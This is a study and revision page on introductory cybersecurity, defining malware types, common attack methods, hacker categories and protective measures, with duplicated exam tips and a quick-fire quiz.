Cyber-Attacks & Ethical Hacking
Cybersecurity protects computer systems, networks, and data from digital attacks, theft, and damage. With everything connected online, understanding cyber threats and how to defend against them is critical for every computer user.
A. Cybersecurity & Cyber Threats
What is Cybersecurity?
Protecting systems, networks, and data from digital attack
| Term | Definition |
|---|---|
| Cybersecurity | The practice of protecting computers, servers, networks, and data from digital attacks, unauthorised access, and damage. Also called Information Security (InfoSec). |
| CIA Triad | The three goals of cybersecurity: Confidentiality (only authorised users see data), Integrity (data is not altered), Availability (data is accessible when needed). |
| Cyber Attack | An intentional attempt to damage, disrupt, or gain unauthorised access to a computer system or network. |
| Vulnerability | A weakness in a system that can be exploited by an attacker. |
| Threat | Any potential danger to a computer system or data. |
| Exploit | A piece of code or technique that takes advantage of a vulnerability to attack a system. |
| Cybercrime | Criminal activity carried out using computers or the internet: hacking, online fraud, identity theft, cyberbullying. |
Cybersecurity
Protecting computers, networks, and data from digital attacks and unauthorised access. Also called Information Security (InfoSec).
CIA Triad — 3 Goals
ConfidentialityOnly authorised users can see the data
IntegrityData is not altered without permission
AvailabilityData is accessible when needed
Cyber Attack
Intentional attempt to damage, disrupt, or gain unauthorised access to a system or network.
Vulnerability vs Threat
VulnerabilityA weakness in a system that can be exploited
ThreatA potential danger that could exploit that weakness
Cybercrime
Criminal activity via computers — hacking, fraud, identity theft, cyberbullying, ransomware.
⚡ Exam Tips
CIA Triad = Confidentiality, Integrity, Availability — the three goals of cybersecurity.
Vulnerability = a weakness · Threat = potential danger · Exploit = code that uses the vulnerability.
Cybersecurity is also called Information Security (InfoSec).
Cybercrime includes hacking, fraud, identity theft, and cyberbullying.
CIA Triad = Confidentiality, Integrity, Availability — the three goals of cybersecurity.
Vulnerability = a weakness · Threat = potential danger · Exploit = code that uses the vulnerability.
Cybersecurity is also called Information Security (InfoSec).
Cybercrime includes hacking, fraud, identity theft, and cyberbullying.
B. Types of Malware
Malicious Software (Malware)
Software designed to damage, disrupt, or gain unauthorised access
| Malware Type | How it Works | Key Feature |
|---|---|---|
| Virus | Attaches itself to legitimate files and spreads when infected files are shared or run. Requires human action to spread. | Needs a host file · Spreads via infected files/email attachments |
| Worm | Self-replicating program that spreads through networks automatically without needing a host file or human action. | Self-replicates · Spreads through network on its own · No host needed |
| Trojan Horse | Malware disguised as legitimate, useful software. Once installed, it creates a backdoor for attackers. Named after the Greek myth. | Disguised as legitimate software · Does NOT self-replicate · Opens backdoor |
| Ransomware | Encrypts the victim's files and demands a ransom payment to restore access. Devastating to organisations. | Encrypts files · Demands payment (usually cryptocurrency) |
| Spyware | Secretly monitors user activity and collects information (passwords, credit card numbers, browsing habits) without consent. | Hidden · Steals personal data · Often bundled with free software |
| Adware | Automatically displays unwanted advertisements. Less harmful but annoying. Often bundled with free software downloads. | Shows unwanted ads · Usually not dangerous |
| Rootkit | Malware that hides itself deep in the operating system to avoid detection, while giving attackers persistent remote access. | Very hard to detect · Gives admin-level access · Hides from OS |
| Keylogger | Records every keystroke typed by the user — capturing passwords, credit card numbers, and messages. | Records keystrokes · Steals passwords and sensitive data |
| Botnet | A network of infected computers (bots/zombies) controlled remotely by an attacker to send spam, launch DDoS attacks, or steal data. | Many infected computers · Controlled remotely · Used for attacks |
Virus
Attaches to files. Needs human action to spread (opening infected email or file). Has a host file.
Worm
Self-replicating. Spreads through networks automatically — no human action and no host file needed.
Trojan Horse
Disguised as useful software. Opens backdoor for attacker. Does NOT self-replicate.
Ransomware
Encrypts your files and demands payment (usually cryptocurrency) to restore access.
Spyware
Secretly monitors user activity and steals passwords, banking details, and browsing habits.
Adware
Displays unwanted advertisements automatically. Less harmful but annoying. Often bundled with free software.
Rootkit
Hides deep in the OS to avoid detection. Gives attacker persistent, admin-level remote access.
Keylogger
Records every keystroke typed — captures passwords, credit card numbers, and messages.
Botnet
Network of infected computers (zombies) controlled remotely. Used to launch DDoS attacks or send spam.
⚡ Exam Tips
Virus = needs a host file + human action to spread.
Worm = self-replicates through network, NO host file, NO human action needed.
Trojan = disguised as useful software, does NOT self-replicate, opens backdoor.
Ransomware = encrypts files + demands payment (best defence = regular backups).
Spyware = secretly steals personal data.
Rootkit = very hard to detect, hides inside OS.
Adware = displays unwanted ads, usually bundled with free software — less harmful.
Keylogger = records every keystroke to steal passwords and card numbers.
Botnet = network of infected zombie computers controlled remotely.
Virus = needs a host file + human action to spread.
Worm = self-replicates through network, NO host file, NO human action needed.
Trojan = disguised as useful software, does NOT self-replicate, opens backdoor.
Ransomware = encrypts files + demands payment (best defence = regular backups).
Spyware = secretly steals personal data.
Rootkit = very hard to detect, hides inside OS.
Adware = displays unwanted ads, usually bundled with free software — less harmful.
Keylogger = records every keystroke to steal passwords and card numbers.
Botnet = network of infected zombie computers controlled remotely.
C. Types of Cyber Attacks
Common Attack Methods
How attackers target systems, networks, and people
| Attack | Description |
|---|---|
| Phishing | Fraudulent emails or messages that appear to come from trusted sources (banks, companies) to trick users into revealing passwords or financial information. Most common social engineering attack. |
| DoS Attack | Denial of Service — flooding a server with so many requests that it crashes and becomes unavailable to legitimate users. |
| DDoS Attack | Distributed Denial of Service — same as DoS but launched simultaneously from thousands of infected computers (botnet). Much more powerful. |
| Man-in-the-Middle | Attacker secretly intercepts communication between two parties — reads, alters, or steals data passing between them. Often on unsecured Wi-Fi. |
| SQL Injection | Attacker inserts malicious SQL code into a website input field to manipulate the database — stealing, deleting, or altering data. |
| Brute Force | Systematically trying every possible password combination until the correct one is found. Simple but effective against weak passwords. |
| Social Engineering | Manipulating people psychologically to reveal confidential information — rather than hacking the computer directly. |
| Zero-Day Attack | Exploiting a software vulnerability that the vendor is not yet aware of — no patch exists yet. Extremely dangerous. |
| Cross-Site Scripting (XSS) | Injecting malicious scripts into a web page viewed by other users — to steal their session cookies or redirect them. |
Phishing
Fake emails/messages pretending to be banks or companies to steal passwords and financial info. Most common social engineering attack.
DoS vs DDoS
DoSOne source floods server until it crashes
DDoSThousands of infected computers (botnet) flood simultaneously — far more powerful
Man-in-the-Middle
Attacker secretly intercepts communication between two parties — reads, alters, or steals data. Common on unsecured Wi-Fi.
SQL Injection
Malicious SQL code entered into website input fields to steal or manipulate database contents.
Brute Force
Systematically tries every possible password combination until the correct one is found. Defeated by long, complex passwords.
Social Engineering
Manipulating people psychologically to reveal confidential info — targets humans, not computers directly. Phishing is a type of social engineering.
Zero-Day Attack
Exploits a vulnerability the software vendor does not yet know about — no patch exists. Extremely dangerous.
Cross-Site Scripting (XSS)
Injects malicious scripts into a web page viewed by other users — steals their session cookies or redirects them to fake sites.
⚡ Exam Tips
Phishing = most common social engineering attack — fake emails pretending to be trusted sources.
DoS = one machine floods a server. DDoS = distributed — many machines (botnet) attack at once.
SQL Injection = database attack via malicious code in input fields.
Brute Force = tries all password combinations — defeated by strong, long passwords.
Zero-Day = unknown vulnerability, no patch available yet — most dangerous type.
Social Engineering = attacks the human, not the machine — phishing is its most common form.
Phishing = most common social engineering attack — fake emails pretending to be trusted sources.
DoS = one machine floods a server. DDoS = distributed — many machines (botnet) attack at once.
SQL Injection = database attack via malicious code in input fields.
Brute Force = tries all password combinations — defeated by strong, long passwords.
Zero-Day = unknown vulnerability, no patch available yet — most dangerous type.
Social Engineering = attacks the human, not the machine — phishing is its most common form.
D. Hacking & Ethical Hacking
Types of Hackers
Classified by intent and permission
White Hat
Legal · With Permission
Ethical hackers hired with owner's permission to find vulnerabilities before criminals do. Also called Penetration Testers.
Black Hat
Illegal · Criminal
Malicious hackers who break into systems without permission for personal gain. Stealing data, money, or causing damage. Criminal activity.
Grey Hat
No Permission · Not Malicious
In between. Hack without permission but without malicious intent — may disclose the vulnerability publicly or charge a fee to fix it.
Blue Hat
External Consultant
Outside security professionals hired to test a system before launch. Similar to White Hat but not permanent employees — contracted for specific tests.
Red Hat
Aggressive · Counter-Attack
Aggressive vigilantes. Instead of reporting Black Hat hackers, they actively attack and shut down the attacker's systems. Extreme white-hat style.
Script Kiddie
No Skill · Uses Scripts
Unskilled individuals who use pre-written hacking tools without understanding how they work. Not a true hacker — no real technical knowledge.
| Concept | Explanation |
|---|---|
| Ethical Hacking | Legally breaking into systems with the owner's permission to find and fix security vulnerabilities before malicious hackers exploit them. Also called Penetration Testing (Pen Testing). |
| Penetration Test | A simulated cyber attack on a system to identify vulnerabilities. Follows 5 phases: Reconnaissance → Scanning → Gaining Access → Maintaining Access → Reporting. |
| CEH | Certified Ethical Hacker — a globally recognised certification for ethical hackers from EC-Council. |
| OSINT | Open Source Intelligence — gathering information about a target from publicly available sources (social media, websites, public records). |
| Firewall | Hardware or software that monitors and controls incoming/outgoing network traffic based on security rules. First line of defence. |
| Intrusion Detection System (IDS) | Monitors network traffic for suspicious activity and alerts administrators. Does NOT block — just detects. |
Penetration Testing — 5 Phases
White Hat vs Black Hat
White Hat = ethical hacker (with permission). Black Hat = criminal hacker (without permission).
Ethical Hacking
Legally finding system vulnerabilities WITH owner's permission. Also called Penetration Testing.
Firewall
Controls incoming/outgoing network traffic based on rules. First line of defence against attacks.
⚡ Exam Tips
White Hat = ethical hacker — legal, with owner's permission. Also called Penetration Tester.
Black Hat = criminal hacker — illegal, without permission, for personal gain.
Grey Hat = no permission but no malicious intent — may disclose or charge a fee to fix.
Blue Hat = external consultant hired to test before launch.
Red Hat = aggressively counter-attacks black hat hackers.
Ethical hacking = Penetration Testing (Pen Testing).
CEH = Certified Ethical Hacker (EC-Council certification).
White Hat = ethical hacker — legal, with owner's permission. Also called Penetration Tester.
Black Hat = criminal hacker — illegal, without permission, for personal gain.
Grey Hat = no permission but no malicious intent — may disclose or charge a fee to fix.
Blue Hat = external consultant hired to test before launch.
Red Hat = aggressively counter-attacks black hat hackers.
Ethical hacking = Penetration Testing (Pen Testing).
CEH = Certified Ethical Hacker (EC-Council certification).
E. Cybersecurity Protection Measures
How to Protect Against Cyber Attacks
| Protection Measure | How it Helps |
|---|---|
| Antivirus Software | Detects, quarantines, and removes malware. Must be kept updated with latest virus definitions. |
| Firewall | Monitors and filters network traffic. Blocks unauthorised connections. |
| Encryption | Converts data into unreadable code. Even if stolen, data cannot be read without the key. HTTPS uses encryption. |
| Strong Passwords | Use long passwords with letters, numbers, and symbols. Never reuse passwords. Use a password manager. |
| Two-Factor Authentication (2FA) | Requires a second verification step (e.g. SMS code) beyond just the password. Much harder to hack. |
| Software Updates/Patches | Updates fix known security vulnerabilities. Outdated software is a major entry point for attackers. |
| Backup | Regular backups of important data. If ransomware strikes, you can restore from backup without paying. |
| VPN | Virtual Private Network — encrypts your internet connection and hides your IP address. Safe for public Wi-Fi. |
| User Awareness Training | Teaching users to recognise phishing, social engineering, and suspicious activity — the human factor is the biggest vulnerability. |
| HTTPS / SSL/TLS | Encrypts data between browser and server. Look for padlock in browser address bar. |
Antivirus
Detects and removes malware. Must be regularly updated.
Encryption
Converts data into unreadable code. HTTPS uses encryption (padlock in browser).
2FA — Two-Factor Authentication
Password + second step (SMS code, app). Much harder to hack than password alone.
VPN
Virtual Private Network — encrypts internet connection, hides IP. Safe for public Wi-Fi.
Backup
Regular data backups. If ransomware hits, restore from backup without paying ransom.
⚡ Exam Tips
VPN = Virtual Private Network — encrypts internet connection and hides IP address.
2FA = Two-Factor Authentication — password + second verification step.
Encryption = converts data to unreadable code. HTTPS uses encryption — padlock in browser.
Best defence against ransomware = regular backups.
Biggest cybersecurity weakness = human error (clicking phishing links, weak passwords).
Antivirus removes malware. Firewall blocks unauthorised connections. IDS detects intrusions (does NOT block).
VPN = Virtual Private Network — encrypts internet connection and hides IP address.
2FA = Two-Factor Authentication — password + second verification step.
Encryption = converts data to unreadable code. HTTPS uses encryption — padlock in browser.
Best defence against ransomware = regular backups.
Biggest cybersecurity weakness = human error (clicking phishing links, weak passwords).
Antivirus removes malware. Firewall blocks unauthorised connections. IDS detects intrusions (does NOT block).
Quick Fire Revision
- CIA Triad stands forConfidentiality, Integrity, Availability
- Virus spreads viaInfected files/attachments (needs human action)
- Worm vs VirusWorm self-replicates through network (no host needed)
- Trojan Horse is disguised asLegitimate/useful software
- Ransomware doesEncrypts files and demands payment
- Spyware secretly doesMonitors user and steals personal data
- Keylogger recordsEvery keystroke (passwords, credit cards)
- Phishing usesFake emails/messages to steal credentials
- DoS vs DDoSDoS = one source · DDoS = many machines (botnet)
- SQL Injection targetsDatabases via malicious code in input fields
- Brute Force attack triesAll possible password combinations
- White Hat hacker isEthical hacker (with owner's permission)
- Black Hat hacker isCriminal hacker (without permission)
- Grey Hat hackerNo permission but not malicious intent
- Ethical hacking also calledPenetration Testing (Pen Testing)
- CEH stands forCertified Ethical Hacker
- Firewall doesMonitors and filters network traffic
- Encryption converts data toUnreadable code (only readable with key)
- 2FA stands forTwo-Factor Authentication
- VPN stands forVirtual Private Network
- Best defence against ransomwareRegular backups
- HTTPS padlock meansEncrypted secure connection (SSL/TLS)
- Botnet isNetwork of infected computers controlled remotely
- Zero-Day attack exploitsUnknown vulnerability — no patch yet
- Cross-Site Scripting (XSS) doesInjects malicious scripts into web pages to steal cookies
- Blue Hat hacker isExternal consultant hired to test before system launch
- Red Hat hacker doesActively attacks and shuts down Black Hat hackers
- Script Kiddie usesPre-written tools with no real technical knowledge
- OSINT stands forOpen Source Intelligence (public info gathering)
- IDS stands forIDS — detects intrusions, does NOT block
- Pen Testing follows _ phasesReconnaissance · Scanning · Gaining Access · Maintaining · Reporting